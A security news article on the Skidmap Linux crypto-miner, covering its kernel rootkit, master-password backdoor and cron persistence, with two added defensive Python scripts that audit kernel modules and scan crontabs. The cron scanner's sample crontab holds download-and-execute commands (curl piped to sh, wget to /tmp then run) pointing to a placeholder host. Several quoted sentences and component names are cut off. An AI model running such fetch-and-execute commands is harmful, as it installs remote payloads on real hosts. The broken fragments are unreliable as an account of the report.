This malware stands out from similar miners because of the way it loads malicious kernel modules to evade detection.
The crypto-miner also sets up a secret master password that it uses to access any user account on the system.
“These kernel-mode rootkits are not only more difficult to detect compared to their user-mode counterparts — attackers can also use them to gain unfettered access to the affected system. A case in point: the way Skidmap can also set up a secret master password that gives it access to any user account in the system,” states the analysis published by Trend Micro. “Conversely, given that many of Skidmap’s routines require root access, the attack vector that Skidmap uses — whether through exploits, misconfigurations, or exposure to the internet — is most likely the same one that provides the attacker root or administrative access to the system.”
Experts noticed that several routines implemented by Skidmap require root access, suggesting that its attack vector is the same one that gave the attackers root or administrative access to the system.
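Because a kernel-mode rootkit of this kind hides by loading its own module, one defender-side check is to audit the loaded modules against a known-good baseline and to cross-check /proc/modules against /sys/module (a module that unlinks itself from the former often still has a sysfs entry). The script below is an added example, not code from the SecurityAffairs article or from Trend Micro's report; the module names in the sample, the baseline allowlist and the `unknown_lkm`/`ghost_lkm` entries are constructed for illustration.

```python
"""Audit loaded Linux kernel modules against a baseline.

Added example (not from the article). Parses text in /proc/modules format,
flags modules outside an allowlist, and cross-checks the /proc view against
/sys/module to catch a module that hides itself from /proc/modules.
"""
import os
from dataclasses import dataclass
from typing import Dict, List, Set


@dataclass
class KernelModule:
    name: str
    size: int
    refcount: int
    used_by: List[str]   # modules that depend on this one
    state: str           # Live / Loading / Unloading


def parse_proc_modules(text: str) -> Dict[str, KernelModule]:
    """Parse /proc/modules lines: name size refcount used_by state address."""
    modules: Dict[str, KernelModule] = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 6:
            continue  # blank or malformed line
        name, size, refcount, deps, state = parts[:5]
        # used_by is "-" when empty, otherwise "dep1,dep2," with a trailing comma
        used_by = [] if deps == "-" else [d for d in deps.rstrip(",").split(",") if d]
        modules[name] = KernelModule(name, int(size), int(refcount), used_by, state)
    return modules


def unexpected_modules(modules: Dict[str, KernelModule], baseline: Set[str]) -> List[str]:
    """Names of loaded modules that are not in the host's known-good baseline."""
    return sorted(n for n in modules if n not in baseline)


def hidden_modules(proc_names: Set[str], sysfs_loadable: Set[str]) -> List[str]:
    """Loadable modules visible in /sys/module but missing from /proc/modules."""
    return sorted(sysfs_loadable - proc_names)


def live_sysfs_loadable(root: str = "/sys/module") -> Set[str]:
    """Loadable (non-built-in) modules: those with a /sys/module/<name>/initstate file."""
    if not os.path.isdir(root):
        return set()
    return {n for n in os.listdir(root)
            if os.path.exists(os.path.join(root, n, "initstate"))}


# Constructed sample input; addresses are zeroed as an unprivileged reader would see them.
SAMPLE_PROC_MODULES = """\
xt_conntrack 16384 1 - Live 0x0000000000000000
nf_conntrack 172032 1 xt_conntrack, Live 0x0000000000000000
ext4 778240 1 - Live 0x0000000000000000
unknown_lkm 20480 0 - Live 0x0000000000000000
"""

# Constructed baseline; on a real host build it from a trusted golden image.
BASELINE = {"xt_conntrack", "nf_conntrack", "ext4"}


if __name__ == "__main__":
    mods = parse_proc_modules(SAMPLE_PROC_MODULES)
    print("not in baseline:", unexpected_modules(mods, BASELINE))
    # Live cross-check (only meaningful on a Linux host):
    print("hidden from /proc/modules:",
          hidden_modules(set(parse_proc_modules(open("/proc/modules").read()))
                         if os.path.exists("/proc/modules") else set(),
                         live_sysfs_loadable()))
```

The baseline comparison catches a module that is loaded under an unfamiliar name; the sysfs cross-check catches one that has removed itself from the module list. Neither replaces a signed-module policy or a memory-forensics pass, since a rootkit that also patches sysfs or procfs handlers can defeat both views.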
The infection chain sees the Skidmap miner installing
“Besides the backdoor access, Skidmap also creates another way for its operators
The main binary checks whether the system runs Debian or RHEL/CentOS, then drops the miner and the other components built for that specific Linux distribution.
Trend Micro experts revealed that the Skidmap miner has notable components designed to obfuscate its activities and ensure that they continue to run. Examples of these components are:
A fake “” binary that replaces the original; once executed, it randomly sets up a malicious cron job to download and execute a file.
Another component is “
Trend Micro also described the “
The last component is “
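Since one of the components above persists by installing a cron job that downloads and executes a file, a practical detection is to scan crontab entries for that download-and-execute shape. The scanner below is an added example and not part of the article or of Trend Micro's analysis; the crontab lines it runs over are constructed, and `example.invalid` is a placeholder host, not an indicator from the report.

```python
"""Flag cron entries that fetch and execute remote content.

Added example (not from the article). Handles user-crontab lines
(5 schedule fields + command), system-wide lines (extra user field),
@reboot-style shorthands, comments and environment assignments.
"""
import re
from typing import List, NamedTuple, Optional, Tuple


class CronFinding(NamedTuple):
    line_no: int
    schedule: str
    command: str
    reasons: List[str]


FETCH_RE = re.compile(r"\b(curl|wget)\b")
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(sh|bash|dash|zsh)\b")
EXEC_AFTER_FETCH_RE = re.compile(r"(chmod\s+\+x|\bsh\s|\bbash\s|&&\s*\./|;\s*\./)")
# A command token that starts with a world-writable directory, at the start of the
# line or right after a ; & | separator (so "-O /tmp/x" as an argument is not counted).
EXEC_FROM_TMP_RE = re.compile(r"(^|[;&|]\s*)(/tmp|/dev/shm|/var/tmp)/\S+")
ENV_ASSIGN_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*=")


def split_cron_line(line: str, system_wide: bool = False) -> Optional[Tuple[str, str]]:
    """Return (schedule, command) or None for comments, env lines and junk."""
    s = line.strip()
    if not s or s.startswith("#") or ENV_ASSIGN_RE.match(s):
        return None
    if s.startswith("@"):  # @reboot, @daily, ...
        parts = s.split(None, 2 if system_wide else 1)
        return parts[0], parts[-1] if len(parts) > 1 else ""
    n_fields = 6 if system_wide else 5  # /etc/crontab carries a user column
    parts = s.split(None, n_fields)
    if len(parts) <= n_fields:
        return None
    return " ".join(parts[:5]), parts[n_fields]


def scan_crontab(text: str, system_wide: bool = False) -> List[CronFinding]:
    """Return one finding per entry that looks like download-and-execute."""
    findings: List[CronFinding] = []
    for line_no, line in enumerate(text.splitlines(), 1):
        parsed = split_cron_line(line, system_wide)
        if parsed is None:
            continue
        schedule, cmd = parsed
        reasons: List[str] = []
        if FETCH_RE.search(cmd):
            if PIPE_TO_SHELL_RE.search(cmd):
                reasons.append("fetch piped to shell")
            elif EXEC_AFTER_FETCH_RE.search(cmd):
                reasons.append("fetch followed by execution")
        if EXEC_FROM_TMP_RE.search(cmd):
            reasons.append("executes from world-writable dir")
        if reasons:
            findings.append(CronFinding(line_no, schedule, cmd, reasons))
    return findings


# Constructed sample crontab; not a real Skidmap artifact.
SAMPLE_CRONTAB = """\
# constructed sample, not a real Skidmap artifact
PATH=/usr/bin:/bin
0 3 * * * /usr/bin/logrotate /etc/logrotate.conf
*/10 * * * * curl -fsSL http://example.invalid/payload | sh
@reboot wget -q -O /tmp/.x http://example.invalid/x && chmod +x /tmp/.x && /tmp/.x
30 2 * * 0 /usr/local/bin/backup.sh
"""


if __name__ == "__main__":
    for f in scan_crontab(SAMPLE_CRONTAB):
        print(f"line {f.line_no}: [{f.schedule}] {f.command}\n    -> {', '.join(f.reasons)}")
```

Run it over `/var/spool/cron/*`, `/etc/crontab` (with `system_wide=True`) and `/etc/cron.d/*`. Because the component described above is a replaced system binary, pair the cron scan with the distribution's own package verification (`rpm -V` on RHEL/CentOS, `dpkg --verify` on Debian), which reports files whose checksums no longer match the installed package.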
(SecurityAffairs – Skidmap miner, Linux)